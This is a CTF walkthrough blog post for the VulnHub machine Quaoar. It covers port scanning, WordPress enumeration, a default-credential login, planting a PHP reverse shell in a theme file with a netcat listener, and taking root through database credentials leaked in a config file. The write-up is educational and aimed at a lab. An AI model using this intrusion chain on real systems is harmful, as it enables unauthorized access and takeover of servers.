6 July 2022

Pentesting Fun Stuff

following the cyber security path…

hackfest2016: Quaoar

Location

https://download.vulnhub.com/hackfest2016/Quaoar.ova

Description

This is a vulnerable machine created for the Hackfest 2016 CTF http://hackfest.ca/
It has level beginner for those who wish to learn more about pentesting/hacking.

Getting started

I start with a nmap scan to see what ports are open and what is running behind those ports.

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $nmap -A -T4 -p- 192.168.171.2
Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-17 16:41 CET
Nmap scan report for 192.168.171.2
Host is up (0.024s latency).
Not shown: 65526 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA)
|   2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA)
|_  256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA)
53/tcp  open  domain      ISC BIND 9.8.1-P1
| dns-nsid:
|_  bind.version: 9.8.1-P1
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: STLS CAPA TOP UIDL PIPELINING RESP-CODES SASL
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2017-03-17T16:43:23+00:00; +59m58s from scanner time.
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: LOGIN-REFERRALS listed OK have ENABLE Pre-login capabilities IDLE LOGINDISABLEDA0001 LITERAL+ SASL-IR ID post-login STARTTLS more IMAP4rev1
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2017-03-17T16:43:24+00:00; +59m58s from scanner time.
445/tcp open  netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
993/tcp open  ssl/imap    Dovecot imapd
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2017-03-17T16:43:24+00:00; +59m58s from scanner time.
995/tcp open  ssl/pop3    Dovecot pop3d
|_pop3-capabilities: CAPA USER TOP UIDL PIPELINING RESP-CODES SASL(PLAIN)
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after:  2026-10-07T04:32:43
|_ssl-date: 2017-03-17T16:43:24+00:00; +59m58s from scanner time.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 59m57s, deviation: 0s, median: 59m57s
|_nbstat: NetBIOS name: QUAOAR, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 3.6.3)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP\x00
|_  System time: 2017-03-17T12:43:23-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 149.23 seconds

Looks like a lot of open ports and services.

Webserver

I start of with Dirb to enumerate the pages.

---- Scanning URL: http://192.168.171.2/ ----
+ http://192.168.171.2/hacking (CODE:200|SIZE:616848)
+ http://192.168.171.2/index (CODE:200|SIZE:100)
+ http://192.168.171.2/index.html (CODE:200|SIZE:100)
+ http://192.168.171.2/robots (CODE:200|SIZE:271)
+ http://192.168.171.2/robots.txt (CODE:200|SIZE:271)
==> DIRECTORY: http://192.168.171.2/upload/
==> DIRECTORY: http://192.168.171.2/wordpress/

Dirb did its work nicely and spat out a very long list, which I cut down to a small piece.
Most interesting is the wordpress site. To enumerate this site I use wpscan.

        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|
        WordPress Security Scanner by the WPScan Team
                       Version 2.9.2
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o [A]bort, default: [N]y
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://192.168.171.2/wordpress/
[+] Started: Fri Mar 17 17:30:27 2017
[!] The WordPress 'http://192.168.171.2/wordpress/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache/2.2.22 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.3.10-1ubuntu3
[+] XML-RPC Interface available under: http://192.168.171.2/wordpress/xmlrpc.php
[!] Upload directory has directory listing enabled: http://192.168.171.2/wordpress/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://192.168.171.2/wordpress/wp-includes/
[+] WordPress version 3.9.14 (Released on 2016-09-07) identified from advanced fingerprinting, meta generator, readme, links opml, stylesheets numbers
[.....SNIP.....]
[!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/8730
    Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
    Reference: https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611
[i] Fixed in: 3.9.16
[.....SNIP.....]
[+] Enumerating usernames ...
[+] Identified the following 2 user/s:
    +----+--------+--------+
    | Id | Login  | Name   |
    +----+--------+--------+
    | 1  | admin  | admin  |
    | 2  | wpuser | wpuser |
    +----+--------+--------+
[!] Default first WordPress username 'admin' is still used
[+] Finished: Fri Mar 17 17:31:29 2017
[+] Requests Done: 4344
[+] Memory used: 49.875 MB
[+] Elapsed time: 00:01:01

It looks like the default username is still active. I would normally try to brute force the password of the found username. But because it has the default settings in place I try  admin:admin first.

And I’m in.
To get a reverse shell I change the ‘search.php’ file and replace the PHP code with the one from pentestmonkey. After I set up a listener I run the code by pressing the search button.

┌─[n13mant@planetmars]─[~]
└──╼ $nc -lvnp 31337
Listening on [0.0.0.0] (family 0, port 31337)
Connection from 192.168.171.2 49617 received!
Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 i686 i386 GNU/Linux
 14:57:19 up  2:19,  0 users,  load average: 0.18, 0.12, 0.08
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

Recon

$ cd /home
$ ls -lah
total 12K
drwxr-xr-x  3 root root 4.0K Oct 24 03:19 .
drwxr-xr-x 22 root root 4.0K Oct  7 00:32 ..
drwxr-xr-x  2 root root 4.0K Oct 22 12:53 wpadmin
$ cd wpadmin
$ ls lah
ls: cannot access lah: No such file or directory
$ ls -lah
total 12K
drwxr-xr-x 2 root    root    4.0K Oct 22 12:53 .
drwxr-xr-x 3 root    root    4.0K Oct 24 03:19 ..
-rw-r--r-- 1 wpadmin wpadmin   33 Oct 22 12:53 flag.txt
$ cat flag.txt
2bafe61f03117ac66a73c3c514de796e

First flag. Looks like a md5 hash.

$ cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.04
DISTRIB_CODENAME=precise
DISTRIB_DESCRIPTION="Ubuntu 12.04 LTS"
www-data@Quaoar:/home/wpadmin$ netstat -ant
netstat -ant
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN

After connecting with the MySQL server it appeared the database had no useful information in it.
When browsing to  /var/www/ I stumbled upon  config.php.

// config file created by LEPTON 2.2.0
define('DB_TYPE', 'mysql');
define('DB_HOST', 'localhost');
define('DB_PORT', '3306');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'rootpassword!');
define('DB_NAME', 'Lepton');
define('TABLE_PREFIX', 'lep_');

It had root credentials inside.

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $ssh root@192.168.171.2
root@192.168.171.2's password:
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)
 * Documentation:  https://help.ubuntu.com/
  System information as of Fri Mar 17 15:44:22 EDT 2017
  System load:  0.17              Processes:             103
  Usage of /:   30.0% of 7.21GB   Users logged in:       0
  Memory usage: 46%               IP address for eth0:   192.168.171.2
  Swap usage:   0%                IP address for virbr0: 192.168.122.1
  Graph this data and manage this system at https://landscape.canonical.com/
New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Sun Jan 15 11:23:45 2017 from desktop-g0lhb7o.snolet.com
root@Quaoar:~#

Now for the next flag.

root@Quaoar:~# cd /root
root@Quaoar:~# ls -lah
total 48K
drwx------  6 root root 4.0K Nov 30 19:52 .
drwxr-xr-x 22 root root 4.0K Oct  7 00:32 ..
drwx------  2 root root 4.0K Oct  7 00:30 .aptitude
-rw-------  1 root root  368 Jan 15 11:25 .bash_history
-rw-r--r--  1 root root 3.1K Apr 19  2012 .bashrc
drwx------  2 root root 4.0K Oct 15 19:23 .cache
----------  1 root root   33 Oct 22 12:44 flag.txt
-rw-r--r--  1 root root  140 Apr 19  2012 .profile
drwx------  2 root root 4.0K Oct 26 20:50 .ssh
-rw-------  1 root root 4.7K Nov 30 19:40 .viminfo
drwxr-xr-x  8 root root 4.0K Jan 29  2015 vmware-tools-distrib
root@Quaoar:~# cat flag.txt
8e3f9ec016e3598c5eec11fd3d73f6fb

The description said something about a post exploitation flag. Unfortunately I didn’t found any.
Oh well. Got root…..so game over. This was the easiest of the three. Time for number 2.

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.